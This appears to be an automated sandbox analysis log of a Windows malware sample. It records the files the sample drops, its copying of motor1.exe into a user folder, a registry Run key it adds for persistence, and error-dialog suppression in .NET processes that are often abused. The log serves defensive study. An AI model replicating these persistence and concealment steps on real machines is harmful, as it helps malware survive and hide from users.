Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\FndPointer.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\boost_filesystem-mt-x64.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\glog.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\boost_filesystem-mt-x64.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndTime.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\cpr.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndException.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndNetworking.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\vcruntime140_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\FndCrashHandler.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\vcomp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_atomic_wait.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\WebUid.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\msvcp140_2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\msvcp140_atomic_wait.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\FndTime.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndOS.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndPointer.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\glog.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\FndFilesystem.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\cpr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\FndException.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\FndString.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndCrashHandler.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\FndVersion.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndString.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\vcomp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\msvcp140_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\FndNetworking.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndHash.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\concrt140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndAppLocations.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndVersion.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\concrt140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndFilesystem.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\vcruntime140_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\motor1.exe	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe	File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_codecvt_ids.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\installutil.exe.log

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run motor1			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run motor1			Jump to behavior

Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
